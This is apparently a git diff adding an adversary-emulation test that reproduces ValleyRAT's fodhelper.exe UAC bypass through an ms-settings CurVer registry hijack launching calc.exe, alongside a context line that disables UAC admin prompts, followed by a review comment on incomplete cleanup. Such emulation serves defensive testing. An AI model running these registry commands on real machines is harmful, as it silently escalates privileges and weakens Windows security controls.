diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 24941299..9c67405d 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -692,4 +692,23 @@ atomic_tests:
 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
 cleanup_command: |
 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
+
+- name: UAC bypassed by Utilizing ProgIDs registry.
+ auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
+ description: |
+ This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
+
+ reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
+
+ echo Triggering fodhelper.exe for potential privilege escalation...
+ start fodhelper.exe
+ cleanup_command: |
+ reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
+ reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
+ name: command_prompt
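Review bot: The new test's `cleanup_command` does not restore the host to its pre-test state: `reg delete ... /ve /f` removes only the default value, so the `.pwn` key tree and the `ms-settings` key the `command:` block creates under HKCU\Software\Classes remain after cleanup, and an orphaned per-user `ms-settings` class key may shadow the system handler for that user. Cleanup should delete the keys the test created rather than their default values, e.g. `reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn" /f` and `reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f`; the calc.exe instance launched through fodhelper is also left running, so a `taskkill` line would belong here too if the runner is expected to leave no residue. The `description:` text reads awkwardly and should say what the test exercises, e.g. `Simulates the fodhelper.exe UAC bypass used by ValleyRAT by registering a custom ProgID under HKCU\Software\Classes and pointing ms-settings\CurVer at it.` The three context lines at the top of the hunk belong to the preceding test, whose definition starts outside the hunk.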